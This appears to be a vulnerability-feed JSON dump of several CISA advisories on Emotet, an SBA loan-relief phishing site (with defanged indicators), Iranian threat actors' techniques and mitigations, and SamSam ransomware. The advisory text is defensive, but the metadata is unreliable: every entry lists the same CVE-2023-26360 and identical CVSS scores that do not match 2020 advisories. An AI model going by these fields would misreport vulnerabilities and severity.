network defenders\u2014in federal, state, local, tribal, territorial governments, and the private sector\u2014consider applying the following best practices 
to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.\n\n * Block email attachments commonly associated with malware (e.g., .dll and .exe).\n * Block email attachments that cannot be scanned by antivirus software (e.g., password-protected .zip files).\n * Implement Group Policy Object (GPO) and firewall rules.\n * Implement an antivirus program and a formalized patch management process.\n * Implement filters at the email gateway, and block suspicious IP addresses at the firewall.\n * Adhere to the principle of least privilege.\n * Implement a Domain-based Message Authentication, Reporting & Conformance (DMARC) validation system.\n * Segment and segregate networks and functions.\n * Limit unnecessary lateral communications.\n * Disable file and printer sharing services. If these services are required, use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) or Active Directory authentication.\n * Enforce multi-factor authentication.\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. 
See [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>).\n * Enable a firewall on agency workstations, configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to suspicious or risky sites.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n * See CISA\u2019s Alert on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more information on addressing potential incidents and applying best practice incident response procedures.\n * See the joint [CISA and MS-ISAC Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) on how to be proactive and prevent ransomware attacks from happening and for a detailed approach on how to respond to an attack and best resolve the cyber incident.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\n\n### Resources\n\n * [MS-ISAC Security Event Primer \u2013 Emotet](<https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/>)\n * [CISA Alert TA18-201A \u2013 Emotet Malware](<https://us-cert.cisa.gov/ncas/alerts/TA18-201A>)\n * [MITRE ATT&CK \u2013 
Emotet](<https://attack.mitre.org/software/S0367/>)\n * [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>)\n\n### References\n\n[[1] Bleeping Computer: Emotet Malware Strikes U.S. Businesses with COVID-19 Spam](<https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/>)\n\n[[2] IBID](<https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/>)\n\n[[3] Security Lab: Emotet Update Increases Downloads](<https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/>)\n\n[[4] Proofpoint: A Comprehensive Look at Emotet\u2019s Summer 2020 Return](<https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return>)\n\n[[5] ZDNet: France, Japan, New Zealand Warn of Sudden Strike in Emotet Attacks](<https://www.zdnet.com/article/france-japan-new-zealand-warn-of-sudden-spike-in-emotet-attacks/>)\n\n[[6] Bleeping Computer: France Warns of Emotet Attacking Companies, Administration](<https://www.bleepingcomputer.com/news/security/france-warns-of-emotet-attacking-companies-administration/>)\n\n[[7] ESET: Emotet Strikes Quebec\u2019s Department of Justice: An ESET Analysis](<https://www.welivesecurity.com/2020/09/16/emotet-quebec-department-justice-eset/>)\n\n[[8] ZDNet: Microsoft, Italy, and the Netherlands Warn of Increased Emotet Activity](<https://www.zdnet.com/article/microsoft-italy-and-the-netherlands-warn-of-increased-emotet-activity/>)\n\n[[9] Bleeping Computer: Emotet Double Blunder: Fake \u2018Windows 10 Mobile\u2019 and Outdated Messages](<https://www.bleepingcomputer.com/news/security/emotet-double-blunder-fake-windows-10-mobile-and-outdated-messages/>)\n\n[[10] Palo Alto Networks: Case Study: Emotet Thread Hijacking, an Email Attack Technique](<https://unit42.paloaltonetworks.com/emotet-thread-hijacking/>)\n\n### Revisions\n\nOctober 6, 2020: Initial Version\n", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Emotet Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-10-24T12:00:00", "id": "AA20-280A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-280a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:05:09", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is currently tracking an unknown malicious cyber actor who is spoofing the Small Business Administration (SBA) COVID-19 loan relief webpage via phishing emails. These emails include a malicious link to the spoofed SBA website that the cyber actor is using for malicious re-directs and credential stealing.\n\n### Technical Details\n\nCISA analysts observed an unknown malicious cyber actor sending a phishing email to various Federal Civilian Executive Branch and state, local, tribal, and territorial government recipients. 
The phishing email contains:\n\n * A subject line, **SBA Application \u2013 Review and Proceed**\n * A sender, marked as **disastercustomerservice@sba[.]gov**\n * Text in the email body urging the recipient to click on a hyperlink to address: \n`hxxps://leanproconsulting[.]com.br/gov/covid19relief/sba.gov`\n * The domain resolves to IP address: `162.214.104[.]246`\n\nFigure 1 is a screenshot of the webpage arrived at by clicking on the hyperlink.\n\n_Figure 1: Webpage arrived at via malicious hyperlink._\n\n### Mitigations\n\nCISA recommends using the following best practices to strengthen the security posture of an organization's systems. System owners and administrators should review any configuration change prior to implementation to avoid unwanted impacts.\n\n * Include warning banners for all emails external to the organization.\n * Maintain up-to-date antivirus signatures and engines. See [Protecting Against Malicious Code](<https://us-cert.cisa.gov/ncas/tips/ST18-271>).\n * Ensure systems have the latest security updates. See [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>).\n * Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\n * Restrict users' permissions to install and run unwanted software applications. Do not add users to the local administrators\u2019 group unless required.\n * Enforce a strong password policy. See [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>).\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. 
See [Using Caution with Email Attachments](<https://us-cert.cisa.gov/ncas/tips/ST04-010>).\n * Enable a personal firewall on agency workstations that is configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs). Sign up to receive CISA\u2019s alerts on security topics and threats.\n * [Sign up](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) for CISA\u2019s free vulnerability scanning and testing services to help organizations secure internet-facing systems from weak configuration and known vulnerabilities. Email [vulnerability_info@cisa.dhs.gov](<mailto: vulnerability_info@cisa.dhs.gov>) to sign up. 
See <https://www.cisa.gov/cyber-resource-hub> for more information about vulnerability scanning and other CISA cybersecurity assessment services.\n\n### Resources\n\n * [CISA Binding Operational Directive 18-01](<https://cyber.dhs.gov/bod/18-01/>)\n * [CISA Insights: Enhance Email and Web Security](<https://www.cisa.gov/sites/default/files/publications/CISAInsights-Cyber-EnhanceEmailandWebSecurity_S508C-a.pdf>)\n * [CISA Tip: Using Caution with Email Attachments](<https://us-cert.cisa.gov/ncas/tips/ST04-010>)\n * [CISA Alert (AA20-099A): COVID-19 Exploited by Malicious Cyber Actors](<https://us-cert.cisa.gov/ncas/alerts/aa20-099a>)\n * [CISA Tip: Avoiding Social Engineering and Phishing Attacks](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)\n * [VirusTotal](<https://www.virustotal.com/gui/url/ba92e042b0f8a05262adbda848b8d0de39a0badf09c219ffdb4cb1f97dcd1388/links>)\n\n### Revisions\n\nAugust 12, 2020: Initial Version|August 14, 2020: Removed some IOCs\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2020-08-14T12:00:00", "type": "ics", "title": "Malicious Cyber Actor Spoofing COVID-19 Loan Relief Webpage via Phishing Emails", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-08-14T12:00:00", "id": "AA20-225A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-225a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:08:00", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is sharing the following information with the cybersecurity community as a primer for assisting in the protection of our Nation\u2019s critical infrastructure in light of the current tensions between the Islamic Republic of Iran and the United States and Iran\u2019s historic use of cyber offensive activities to retaliate against perceived harm. Foremost, CISA recommends organizations take the following actions:\n\n 1. **Adopt a state of heightened awareness.** This includes minimizing coverage gaps in personnel availability, more consistently consuming relevant threat intelligence, and making sure emergency call trees are up to date.\n 2. **Increase organizational vigilance.** Ensure security personnel are monitoring key internal security capabilities and that they know how to identify anomalous behavior. Flag any known Iranian indicators of compromise and tactics, techniques, and procedures (TTPs) for immediate response.\n 3. **Confirm reporting processes.** Ensure personnel know how and when to report an incident. The well-being of an organization\u2019s workforce and cyber infrastructure depends on awareness of threat activity. Consider reporting incidents to CISA to help serve as part of CISA\u2019s early warning system (see Contact Information section below).\n 4. **Exercise organizational incident response plans.** Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are your various data sources logging as expected? 
Ensure personnel are positioned to act in a calm and unified manner.\n\n### Technical Details\n\n## Iranian Cyber Threat Profile\n\nIran has a history of leveraging asymmetric tactics to pursue national interests beyond its conventional capabilities. More recently, its use of offensive cyber operations is an extension of that doctrine. Iran has exercised its increasingly sophisticated capabilities to suppress both social and political perspectives deemed dangerous to Iran and to harm regional and international opponents.\n\nIranian cyber threat actors have continuously improved their offensive cyber capabilities. They continue to engage in more \u201cconventional\u201d activities ranging from website defacement, distributed denial of service (DDoS) attacks, and theft of personally identifiable information (PII), but they have also demonstrated a willingness to push the boundaries of their activities, which include destructive wiper malware and, potentially, cyber-enabled kinetic attacks.\n\nThe U.S. intelligence community and various private sector threat intelligence organizations have identified the Islamic Revolutionary Guard Corps (IRGC) as a driving force behind Iranian state-sponsored cyberattacks\u2013either through contractors in the Iranian private sector or by the IRGC itself.\n\n## Iranian Cyber Activity\n\nAccording to open-source information, offensive cyber operations targeting a variety of industries and organizations\u2014including financial services, energy, government facilities, chemical, healthcare, critical manufacturing, communications, and the defense industrial base\u2014have been attributed, or allegedly attributed, to the Iranian government. The same reporting has associated Iranian actors with a range of high-profile attacks, including the following:\n\n * **Late 2011 to Mid-2013 \u2013 DDoS Targeting U.S. Financial Sector:** In response to this activity, in March 2016, the U.S. 
Department of Justice indicted seven Iranian actors employed by companies performing work on behalf of the IRGC for conducting DDoS attacks primarily targeting the public-facing websites of U.S. banks. The attacks prevented customers from accessing their accounts and cost the banks millions of dollars in remediation. [[1]](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>)\n * **August/September 2013 \u2013 Unauthorized Access to Dam in New York State:** In response, in March 2016, the U.S. Department of Justice indicted one Iranian actor employed by a company performing work on behalf of the IRGC for illegally accessing the supervisory control and data acquisition (SCADA) systems of the Bowman Dam in Rye, New York. The access allowed the actor to obtain information regarding the status and operation of the dam. [[2]](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>)\n * **February 2014 \u2013 Sands Las Vegas Corporation Hacked:** Cyber threat actors hacked into the Sands Las Vegas Corporation in Las Vegas, Nevada, and stole customer data, including credit card data, Social Security Numbers, and driver\u2019s license numbers. According to a Bloomberg article from December 2014, the attack also involved a destructive portion, in which the Sands Las Vegas Corporation\u2019s computer systems were wiped. In September 2015, the U.S. Director of National Intelligence identified the Iranian government as the perpetrator of the attack in a Statement for the Record to the House Permanent Select Committee on Intelligence. [[3]](<https://www.bloomberg.com/news/articles/2014-12-11/iranian-hackers-hit-sheldon-adelsons-sands-casino-in-las-vegas#p2>)\n * **2013 to 2017 \u2013 Cyber Theft Campaign on Behalf of IRGC:** In response, in March 2018, the U.S. 
Justice Department indicted nine Iranian actors associated with the Mabna Institute for conducting a massive cyber theft campaign containing dozens of individual incidents, including \u201cmany on behalf of the IRGC.\u201d The thefts targeted academic and intellectual property data as well as email account credentials. According to the indictment, the campaign targeted \u201c144 U.S. universities, 176 universities across 21 foreign countries, 47 domestic and foreign private sector companies, the U.S. Department of Labor, the Federal Energy Regulatory Commission, the State of Hawaii, the State of Indiana, the United Nations, and the United Nations Children\u2019s Fund.\u201d [[4]](<https://www.justice.gov/opa/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic-revolutionary>)\n\n### Mitigations\n\n## Recommended Actions\n\nThe following is a composite of actionable technical recommendations for IT professionals and providers to reduce their overall vulnerability. These recommendations are not exhaustive; rather they focus on the actions that will likely have the highest return on investment. In general, CISA recommends two courses of action in the face of potential threat from Iranian actors: 1) vulnerability mitigation and 2) incident preparation.\n\n 1. **Disable all unnecessary ports and protocols.** Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for command and control activity.\n 2. **Enhance monitoring of network and email traffic.** Review network signatures and indicators for focused operations activities, monitor for new phishing themes and adjust email rules accordingly, and follow best practices of restricting attachments via email or other mechanisms. \n 3. 
**Patch externally facing equipment.** Focus on patching critical and high vulnerabilities that allow for remote code execution or denial of service on externally facing equipment.\n 4. **Log and limit usage of PowerShell.** Limit the usage of PowerShell to only users and accounts that need it, enable code signing of PowerShell scripts, and enable logging of all PowerShell commands.\n 5. **Ensure backups are up to date** and stored in an easily retrievable location that is air-gapped from the organizational network.\n\n## Patterns of Publicly Known Iranian Advanced Persistent Threats\n\nThe following mitigations and detection recommendations regarding publicly known Iranian advanced persistent threat (APT) techniques are based on the [MITRE ATT&CK Framework](<https://attack.mitre.org/>). [[5]](<https://attack.mitre.org/>)\n\n**Iranian APT Technique** | **Mitigation and Detection** \n---|--- \n[Credential Dumping](<https://attack.mitre.org/versions/v7/techniques/T1003/>) | \n\nMitigation\n\n * Manage the access control list for \"Replicating Directory Changes\" and other permissions associated with domain controller replication.\n\n * Consider disabling or restricting NTLM.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.\n\nDetection\n\n * Windows: Monitor for unexpected processes interacting with lsass.exe.\n * Linux: The AuditD monitoring tool can be used to watch for hostile processes opening a maps file in the proc file system, alerting on the pid, process name, and arguments for such programs. 
\n[Obfuscated Files or Information](<https://attack.mitre.org/versions/v7/techniques/T1027/>) | \n\nMitigation\n\n * Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\nDetection\n\n * Windows: Monitor for unexpected processes interacting with lsass.exe.\n * Linux: The AuditD monitoring tool can be used to watch for hostile processes opening a maps file in the proc file system, alerting on the pid, process name, and arguments for such programs. \n[Data Compressed](<https://attack.mitre.org/versions/v7/techniques/T1002/>) | \n\nMitigation\n\n * Network intrusion prevention or data loss prevention tools may be set to block specific file types from leaving the network over unencrypted channels.\n\nDetection\n\n * Process monitoring and monitoring for command-line arguments for known compression utilities.\n * If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. \n[PowerShell](<https://attack.mitre.org/versions/v7/techniques/T1086/>) | \n\nMitigation\n\n * Set PowerShell execution policy to execute only signed scripts.\n * Remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions.\n * Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.\n * Restrict PowerShell execution policy to administrators.\n\nDetection\n\n * If PowerShell is not used in an environment, looking for PowerShell execution may detect malicious activity.\n * Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System. 
Management.Automation.dll (especially to unusual process names/locations).\n * Turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). \n \n[User Execution](<https://attack.mitre.org/versions/v7/techniques/T1204/>)\n\n| \n\nMitigation\n\n * Application allow listing may be able to prevent the running of executables masquerading as other files.\n * If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity.\n * Block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr., .exe, .pif, .cpl, etc.\n * Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.\n\nDetection\n\n * Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files that can be used to Deobfuscate/Decode Files or Information in payloads.\n * Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer.\n * Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting. \n[Scripting](<https://attack.mitre.org/versions/v7/techniques/T1064/>) | \n\nMitigation\n\n * Configure Office security settings enable Protected View, to execute within a sandbox environment, and to block macros through Group Policy. 
Other types of virtualization and application microsegmentation may also mitigate the impact of compromise.\n * Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell.\n\nDetection\n\n * Examine scripting user restrictions. Evaluate any attempts to enable scripts running on a system that would be considered suspicious.\n * Scripts should be captured from the file system when possible to determine their actions and intent.\n * Monitor processes and command-line arguments for script execution and subsequent behavior.\n * Analyze Office file attachments for potentially malicious macros.\n * Office processes, such as winword.exe, spawning instances of cmd.exe, script applications like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. \n[Registry Run Keys/Startup Folder](<https://attack.mitre.org/versions/v7/techniques/T1060/>) | \n\nMitigation\n\n * This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.\n\nDetection\n\n * Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc.\n * Monitor the start folder for additions or changes.\n * Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders.\n * To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. 
\n[Remote File Copy](<https://attack.mitre.org/versions/v7/techniques/T1105/>) | \n\nMitigation\n\n * Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level.\n\nDetection\n\n * Monitor for file creation and files transferred within a network over SMB.\n * Monitor use of utilities, such as FTP, that does not normally occur.\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. \n \n[Spearphishing Link](<https://attack.mitre.org/versions/v7/techniques/T1192/>)\n\n| \n\nMitigation\n\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Users can be trained to identify social engineering techniques and spearphishing emails with malicious links.\n\nDetection\n\n * URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites.\n * Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. 
\n[Spearphishing Attachment](<https://attack.mitre.org/versions/v7/techniques/T1193/>) | \n\nMitigation\n\n * Anti-virus can automatically quarantine suspicious files.\n * Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.\n * Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc.\n * Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments in Obfuscated Files or Information.\n * Users can be trained to identify social engineering techniques and spearphishing emails.\n\nDetection\n\n * Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit.\n * Detonation chambers may also be used to identify malicious attachments.\n * Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n * Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. \n \n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> \"Email CISA Central\" ) (UNCLASS)\n * us-cert@dhs.sgov.gov (SIPRNET)\n * us-cert@dhs.ic.gov (JWICS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. 
Reporting forms can be found on the CISA homepage at <http://www.us-cert.gov/>.\n\n### References\n\n[[1] Department of Justice press release: Seven Iranians Working for Islamic Revolutionary Guard Corps-Affiliated Entities Charged for Conducting Coordinated Campaign of Cyber Attacks Against U.S. Financial Sector](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>)\n\n[[2] Department of Justice press release: Seven Iranians Working for Islamic Revolutionary Guard Corps-Affiliated Entities Charged for Conducting Coordinated Campaign of Cyber Attacks Against U.S. Financial Sector](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>)\n\n[[3] Bloomberg article: Now at the Sands Casino: An Iranian Hacker in Every Server](<https://www.bloomberg.com/news/articles/2014-12-11/iranian-hackers-hit-sheldon-adelsons-sands-casino-in-las-vegas#p2>)\n\n[[4] Department of Justice press release: Nine Iranians Charged With Conducting Massive Cyber Theft Campaign on Behalf of the Islamic Revolutionary Guard Corps](<https://www.justice.gov/opa/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic-revolutionary>)\n\n[[5] MITRE ATT&CK Framework](<https://attack.mitre.org/>)\n\n[CISA Insights: Increased Geopolitical Tensions and Threats](<https://www.cisa.gov/insights>)\n\n### Revisions\n\nJanuary 6, 2019: Initial version|October 23, 2020\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Potential for Iranian 
Cyber Response to U.S. Military Strike in Baghdad", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-10-24T12:00:00", "id": "AA20-006A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-006a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T11:19:20", "description": "### Summary\n\nThe Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the Federal Bureau of Investigation (FBI) are issuing this activity alert to inform computer network defenders about SamSam ransomware, also known as MSIL/Samas.A. Specifically, this product shares analysis of vulnerabilities that cyber actors exploited to deploy this ransomware. In addition, this report provides recommendations for prevention and mitigation.\n\nThe SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally. Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms.\n\nThe actors exploit Windows servers to gain persistent access to a victim\u2019s network and infect all reachable hosts. 
According to reporting from victims in early 2016, cyber actors used the JexBoss Exploit Kit to access vulnerable JBoss applications. Since mid-2016, FBI analysis of victims\u2019 machines indicates that cyber actors use Remote Desktop Protocol (RDP) to gain persistent access to victims\u2019 networks. Typically, actors either use brute force attacks or stolen login credentials. Detecting RDP intrusions can be challenging because the malware enters through an approved access point.\n\nAfter gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims\u2019 action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.\n\nAnalysis of tools found on victims\u2019 networks indicated that successful cyber actors purchased several of the stolen RDP credentials from known darknet marketplaces. FBI analysis of victims\u2019 access logs revealed that the SamSam actors can infect a network within hours of purchasing the credentials. While remediating infected systems, several victims found suspicious activity on their networks unrelated to SamSam. This activity is a possible indicator that the victims\u2019 credentials were stolen, sold on the darknet, and used for other illegal activity.\n\nSamSam actors leave ransom notes on encrypted computers. These instructions direct victims to establish contact through a Tor hidden service site. After paying the ransom in Bitcoin and establishing contact, victims usually receive links to download cryptographic keys and tools to decrypt their network.\n\n### Technical Details\n\nNCCIC recommends organizations review the following SamSam Malware Analysis Reports. The reports represent four SamSam malware variants. 
This is not an exhaustive list.\n\n * MAR-10219351.r1.v2 \u2013 SamSam1\n * MAR-10166283.r1.v1 \u2013 SamSam2\n * MAR-10158513.r1.v1 \u2013 SamSam3\n * MAR-10164494.r1.v1 \u2013 SamSam4\n\nFor general information on ransomware, see the NCCIC Security Publication at https://www.us-cert.gov/security-publications/Ransomware.\n\n### Mitigations\n\nDHS and FBI recommend that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes before implementation to avoid unwanted impacts.\n\n * Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.\n * Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.\n * Enable strong passwords and account lockout policies to defend against brute force attacks.\n * Where possible, apply two-factor authentication.\n * Regularly apply system and software updates.\n * Maintain a good back-up strategy.\n * Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.\n * When creating cloud-based virtual machines, adhere to the cloud provider\u2019s best practices for remote access.\n * Ensure that third parties that require RDP access follow internal policies on remote access.\n * Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.\n * Regulate and limit external-to-internal RDP connections. 
